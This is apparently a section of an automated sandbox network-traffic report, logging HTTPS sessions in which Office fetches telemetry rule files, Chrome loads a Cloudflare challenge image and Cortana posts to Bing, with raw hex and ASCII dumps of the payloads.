                                                                                                                                                            2024-10-08 03:08:52 UTC1369INData Raw: 4d 65 6f 71 4c 33 73 34 38 4b 73 75 36 76 65 31 4c 62 77 34 63 54 30 34 37 76 50 37 62 33 71 7a 2f 48 37 2b 74 66 63 78 74 44 45 36 39 77 45 32 77 49 46 36 64 7a 6b 30 2b 33 48 37 52 49 4a 41 75 7a 78 44 67 76 63 46 66 77 56 44 66 54 36 44 69 4d 48 4b 53 51 6f 2f 4f 63 45 44 68 7a 72 42 2b 77 4d 45 67 6f 32 4c 43 48 77 41 2f 4d 52 47 66 30 35 46 42 45 2f 4c 43 38 51 4e 67 63 48 47 69 77 66 48 30 30 58 49 42 34 71 45 6b 67 7a 43 43 6b 6a 51 53 56 63 46 45 78 52 54 54 73 75 50 45 4e 64 4e 57 52 6d 4d 6a 6b 79 5a 56 77 36 53 44 64 6b 50 30 78 78 54 55 42 50 55 32 56 75 55 6a 52 74 64 6d 78 4f 4e 30 42 4b 56 6f 42 44 62 30 55 2f 57 6d 64 43 51 6f 35 4f 68 49 64 38 6b 45 35 47 55 59 47 49 6c 34 65 59 69 58 4b 4c 64 6f 75 4a 58 31 52 39 6c 6e 61 57 59 48 61 56
                                                                                                                                                            Data Ascii: MeoqL3s48Ksu6ve1Lbw4cT047vP7b3qz/H7+tfcxtDE69wE2wIF6dzk0+3H7RIJAuzxDgvcFfwVDfT6DiMHKSQo/OcEDhzrB+wMEgo2LCHwA/MRGf05FBE/LC8QNgcHGiwfH00XIB4qEkgzCCkjQSVcFExRTTsuPENdNWRmMjkyZVw6SDdkP0xxTUBPU2VuUjRtdmxON0BKVoBDb0U/WmdCQo5OhId8kE5GUYGIl4eYiXKLdouJX1R9lnaWYHaV
                                                                                                                                                            2024-10-08 03:08:52 UTC1369INData Raw: 66 4a 78 2b 4c 42 36 73 6e 54 37 74 4b 77 38 4e 4f 34 75 62 66 33 38 37 54 55 30 66 48 42 43 64 7a 37 76 50 33 4c 43 74 6a 33 36 63 6e 6e 37 39 45 42 36 65 34 56 43 76 51 4f 37 51 37 61 39 2f 77 41 34 76 59 69 4a 79 45 47 35 2f 33 7a 42 67 6b 58 2f 52 6a 39 4d 4f 6b 47 45 43 55 67 47 52 51 6b 4e 51 55 75 44 6a 4d 78 41 54 73 43 48 68 49 69 50 42 55 62 53 51 4d 64 4c 42 6f 48 52 44 46 46 55 79 49 7a 4e 43 52 43 4e 30 78 57 56 6b 55 2b 4e 6a 78 69 56 6b 52 67 4d 53 38 7a 5a 54 4d 67 4b 79 70 67 50 54 64 6f 54 6d 70 52 54 47 35 53 57 47 78 51 5a 6e 52 78 63 32 39 39 54 48 42 30 50 6c 64 50 55 46 39 46 52 45 4b 49 61 6d 46 65 57 57 70 74 65 32 4a 38 59 70 52 4f 61 6f 64 53 68 48 31 33 58 5a 6c 72 6f 4a 78 78 6e 35 5a 66 5a 57 47 6e 69 49 65 48 68 35 5a 71 71
                                                                                                                                                            Data Ascii: fJx+LB6snT7tKw8NO4ubf387TU0fHBCdz7vP3LCtj36cnn79EB6e4VCvQO7Q7a9/wA4vYiJyEG5/3zBgkX/Rj9MOkGECUgGRQkNQUuDjMxATsCHhIiPBUbSQMdLBoHRDFFUyIzNCRCN0xWVkU+NjxiVkRgMS8zZTMgKypgPTdoTmpRTG5SWGxQZnRxc299THB0PldPUF9FREKIamFeWWpte2J8YpROaodShH13XZlroJxxn5ZfZWGniIeHh5Zqq
                                                                                                                                                            2024-10-08 03:08:52 UTC1369INData Raw: 76 37 62 66 6c 77 38 61 30 7a 4c 6e 49 37 66 6e 66 7a 74 58 62 39 74 66 2b 33 65 66 38 2b 2b 50 2b 33 2b 44 6c 37 77 7a 64 36 77 66 6b 45 77 6b 52 37 76 72 55 33 39 7a 72 49 41 45 53 49 2b 55 62 42 76 30 57 4a 78 30 44 4a 79 49 6f 49 68 4d 7a 48 67 54 75 4b 79 51 73 4a 68 6f 72 44 52 51 78 48 2f 73 73 4d 6b 4e 42 45 30 55 6e 4f 54 55 68 47 6a 63 72 42 6b 5a 51 4c 54 46 57 50 6b 64 57 47 43 77 62 47 79 5a 4d 48 52 63 2f 49 6a 74 69 55 32 4d 6c 48 6a 70 48 52 7a 31 46 5a 6d 74 6b 4d 46 35 74 50 79 78 68 4c 6b 63 33 62 58 4a 36 66 56 4a 55 63 6f 42 78 5a 45 42 50 54 6c 35 36 59 55 47 49 65 49 31 6a 57 55 6d 4b 67 5a 4e 67 6a 49 68 6c 55 6f 70 6d 69 5a 78 75 6d 6d 78 61 67 5a 69 52 70 47 39 36 66 6e 64 30 69 58 57 47 70 59 35 37 61 6f 42 75 6f 36 32 72 6f 36
                                                                                                                                                            Data Ascii: v7bflw8a0zLnI7fnfztXb9tf+3ef8++P+3+Dl7wzd6wfkEwkR7vrU39zrIAESI+UbBv0WJx0DJyIoIhMzHgTuKyQsJhorDRQxH/ssMkNBE0UnOTUhGjcrBkZQLTFWPkdWGCwbGyZMHRc/IjtiU2MlHjpHRz1FZmtkMF5tPyxhLkc3bXJ6fVJUcoBxZEBPTl56YUGIeI1jWUmKgZNgjIhlUopmiZxummxagZiRpG96fnd0iXWGpY57aoBuo62ro6
                                                                                                                                                            2024-10-08 03:08:52 UTC1369INData Raw: 33 39 4c 59 41 39 76 50 32 76 62 76 2b 4f 62 4a 35 67 6e 36 42 64 2f 6f 43 77 30 4a 38 74 2f 75 38 41 37 6c 31 74 4c 74 2b 2b 6e 73 43 68 44 35 44 50 67 59 48 66 51 63 47 78 55 6f 43 67 48 39 2b 75 37 34 37 42 51 48 44 54 63 51 42 41 38 72 4a 43 30 62 2f 52 73 2f 4c 6b 4e 42 45 6a 51 34 41 68 63 56 41 52 74 4c 43 55 46 4d 4b 79 56 49 4a 55 59 55 56 54 59 4b 53 55 4d 55 54 67 38 37 46 7a 41 2b 4d 56 63 36 49 6a 52 53 49 7a 67 6f 49 31 31 72 4a 57 42 6c 4f 56 49 71 54 7a 4e 4e 56 6d 56 59 65 6a 64 63 64 44 77 35 62 6b 74 6a 56 59 4d 33 65 6d 46 58 57 6e 70 44 52 58 64 75 63 49 39 6e 6b 58 79 53 6a 55 79 59 6a 59 69 4d 6c 57 39 70 65 48 68 75 63 59 31 6a 6a 56 79 6e 64 4b 47 41 63 70 4e 36 69 4a 79 5a 69 34 6d 6a 67 71 69 54 64 70 4f 32 70 37 4f 34 65 6e 71
                                                                                                                                                            Data Ascii: 39LYA9vP2vbv+ObJ5gn6Bd/oCw0J8t/u8A7l1tLt++nsChD5DPgYHfQcGxUoCgH9+u747BQHDTcQBA8rJC0b/Rs/LkNBEjQ4AhcVARtLCUFMKyVIJUYUVTYKSUMUTg87FzA+MVc6IjRSIzgoI11rJWBlOVIqTzNNVmVYejdcdDw5bktjVYM3emFXWnpDRXducI9nkXySjUyYjYiMlW9peHhucY1jjVyndKGAcpN6iJyZi4mjgqiTdpO2p7O4enq
                                                                                                                                                            2024-10-08 03:08:52 UTC1369INData Raw: 73 37 61 31 41 66 43 34 64 54 5a 34 4f 66 72 43 77 76 4b 34 38 2f 48 31 74 41 42 31 41 63 63 47 74 6f 50 36 77 30 42 43 78 62 6b 46 52 41 6d 43 67 6f 4a 48 78 59 69 4c 53 63 77 4b 50 45 50 41 43 51 53 4d 2b 6f 33 4a 44 6f 4e 42 79 30 62 43 69 77 59 4e 55 4d 66 49 66 34 6d 48 51 51 4d 4c 69 51 6c 51 41 4d 78 4f 78 4e 42 54 78 41 51 57 43 77 55 58 46 73 62 54 31 78 61 51 45 35 61 59 56 39 47 4e 47 4a 54 50 6a 64 6c 51 43 78 72 57 6a 42 4d 61 58 4e 45 5a 7a 56 30 5a 46 56 33 64 33 68 56 64 6e 70 36 4f 34 47 44 5a 48 52 54 63 55 6c 6f 67 6f 6d 49 62 59 36 50 63 45 6c 69 67 6d 53 45 59 34 52 36 65 57 69 4d 62 6e 46 73 69 6f 4a 74 63 6f 31 30 6e 70 32 6f 69 59 6c 35 6e 48 36 4a 65 71 43 41 6f 6e 47 7a 6e 35 4b 44 75 49 36 4a 74 36 5a 39 6f 48 69 77 6f 70 32 51
                                                                                                                                                            Data Ascii: s7a1AfC4dTZ4OfrCwvK48/H1tAB1AccGtoP6w0BCxbkFRAmCgoJHxYiLScwKPEPACQSM+o3JDoNBy0bCiwYNUMfIf4mHQQMLiQlQAMxOxNBTxAQWCwUXFsbT1xaQE5aYV9GNGJTPjdlQCxrWjBMaXNEZzV0ZFV3d3hVdnp6O4GDZHRTcUlogomIbY6PcEligmSEY4R6eWiMbnFsioJtco10np2oiYl5nH6JeqCAonGzn5KDuI6Jt6Z9oHiwop2Q
                                                                                                                                                            2024-10-08 03:08:52 UTC1369INData Raw: 58 37 42 4e 6a 63 2f 67 59 50 32 77 54 6b 31 74 45 46 36 66 76 52 43 65 77 50 36 51 6e 63 38 4f 34 55 39 66 6a 30 46 79 41 46 2b 52 76 6e 47 69 6b 66 45 52 38 43 49 76 41 66 42 53 63 77 43 51 55 72 44 44 73 4b 4d 43 49 52 44 7a 4d 37 4d 78 41 32 42 44 59 43 4e 51 6b 68 47 44 34 4e 4c 41 39 41 45 53 77 4f 52 79 68 58 4b 55 6f 5a 52 79 6c 50 51 6a 30 74 56 46 74 53 59 56 63 36 51 54 56 63 54 56 6f 71 58 30 46 69 4c 6d 52 71 63 30 42 6c 53 6b 6c 49 61 6a 6c 67 4f 6d 39 33 62 6a 35 74 51 56 56 51 65 47 70 59 51 6e 79 44 65 31 6c 2b 54 58 43 4e 67 33 5a 31 59 49 64 55 68 6c 61 49 57 57 68 57 6a 35 61 66 62 70 4f 47 66 47 4b 58 69 6e 6c 31 6e 48 32 61 5a 70 6c 74 68 47 36 6a 72 4a 47 43 70 59 6c 74 68 36 70 35 69 4c 6d 76 66 48 57 4e 73 36 61 56 6b 62 65 46 73
                                                                                                                                                            Data Ascii: X7BNjc/gYP2wTk1tEF6fvRCewP6Qnc8O4U9fj0FyAF+RvnGikfER8CIvAfBScwCQUrDDsKMCIRDzM7MxA2BDYCNQkhGD4NLA9AESwORyhXKUoZRylPQj0tVFtSYVc6QTVcTVoqX0FiLmRqc0BlSklIajlgOm93bj5tQVVQeGpYQnyDe1l+TXCNg3Z1YIdUhlaIWWhWj5afbpOGfGKXinl1nH2aZplthG6jrJGCpYlth6p5iLmvfHWNs6aVkbeFs
                                                                                                                                                            2024-10-08 03:08:52 UTC1369INData Raw: 62 79 67 4d 4d 34 78 45 56 2b 68 49 52 44 2b 73 58 37 41 2f 62 32 75 4d 52 39 43 4c 6c 46 2b 4c 69 34 52 76 37 48 69 67 66 41 67 30 65 49 67 63 41 39 44 51 69 2b 41 55 65 2b 52 6a 2b 4c 76 73 37 49 44 45 45 4f 6b 4e 42 43 43 56 48 53 45 67 6c 52 54 31 4a 4c 45 78 43 4a 69 45 6c 51 53 31 55 4b 56 63 79 4c 46 31 55 56 32 4d 2b 57 56 73 5a 55 6c 45 6c 56 69 74 66 5a 57 63 34 5a 6b 42 76 52 47 4a 48 53 57 42 6e 57 33 70 31 62 56 31 2f 57 6e 56 34 56 57 35 74 51 58 35 48 65 34 47 44 56 34 4a 63 69 32 4e 2b 59 32 56 38 68 47 65 57 6b 59 70 70 6d 33 61 52 6c 48 32 4b 69 56 31 62 59 35 65 64 6e 33 61 65 65 61 4e 6b 70 71 68 38 70 61 53 52 73 6d 71 68 72 4a 57 44 70 70 75 59 65 62 43 63 74 72 69 70 6c 62 79 52 76 35 71 55 78 62 71 2f 79 36 6d 35 78 72 2b 49 73 6f
                                                                                                                                                            Data Ascii: bygMM4xEV+hIRD+sX7A/b2uMR9CLlF+Li4Rv7HigfAg0eIgcA9DQi+AUe+Rj+Lvs7IDEEOkNBCCVHSEglRT1JLExCJiElQS1UKVcyLF1UV2M+WVsZUlElVitfZWc4ZkBvRGJHSWBnW3p1bV1/WnV4VW5tQX5He4GDV4Jci2N+Y2V8hGeWkYppm3aRlH2KiV1bY5edn3aeeaNkpqh8paSRsmqhrJWDppuYebCctriplbyRv5qUxbq/y6m5xr+Iso


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            25192.168.2.54975013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:52 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:52 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:52 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 3788
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                            x-ms-request-id: 4545068c-701e-0050-0e05-176767000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030852Z-1657d5bbd48wd55zet5pcra0cg00000004e0000000003v9b
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:52 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            26192.168.2.54975113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:52 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:52 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:52 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 2160
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                            x-ms-request-id: e0788fa6-201e-0085-27ac-1834e3000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030852Z-1657d5bbd48hzllksrq1r6zsvs00000001hg00000000hvg7
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:52 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            27192.168.2.54975213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:52 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:52 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 408
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                            x-ms-request-id: b27588a3-a01e-003d-6001-1798d7000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030852Z-1657d5bbd48xdq5dkwwugdpzr000000004rg000000008ph0
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:52 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            28192.168.2.54975313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:52 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:52 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:52 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 2980
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                            x-ms-request-id: 8aaf7b13-d01e-0028-46fd-167896000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030852Z-1657d5bbd482tlqpvyz9e93p5400000004m00000000000u3
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:52 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            29192.168.2.549756104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:52 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cf2ed9a6c2641de/1728356926478/QCsHjgUpquPAy0Z HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:52 UTC170INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:52 GMT
                                                                                                                                                            Content-Type: image/png
                                                                                                                                                            Content-Length: 61
                                                                                                                                                            Connection: close
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2edcd4819729b-EWR
                                                                                                                                                            2024-10-08 03:08:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 17 00 00 00 1e 08 02 00 00 00 48 47 12 3f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                            Data Ascii: PNGIHDRHG?IDAT$IENDB`


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            30192.168.2.54975523.1.237.91443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:52 UTC2100OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                            Origin: https://www.bing.com
                                                                                                                                                            Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                            Content-type: text/xml
                                                                                                                                                            X-Agent-DeviceId: 01000A410900D492
                                                                                                                                                            X-BM-CBT: 1696428841
                                                                                                                                                            X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                            X-BM-DeviceDimensions: 784x984
                                                                                                                                                            X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                            X-BM-DeviceScale: 100
                                                                                                                                                            X-BM-DTZ: 120
                                                                                                                                                            X-BM-Market: CH
                                                                                                                                                            X-BM-Theme: 000000;0078d7
                                                                                                                                                            X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                            X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                                                                                                            X-Device-isOptin: false
                                                                                                                                                            X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                            X-Device-OSSKU: 48
                                                                                                                                                            X-Device-Touch: false
                                                                                                                                                            X-DeviceID: 01000A410900D492
                                                                                                                                                            X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                                                                                                            X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                            X-PositionerType: Desktop
                                                                                                                                                            X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                            X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                            X-Search-SafeSearch: Moderate
                                                                                                                                                            X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                                                            X-UserAgeClass: Unknown
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                            Host: www.bing.com
                                                                                                                                                            Content-Length: 2484
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1728356896897&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
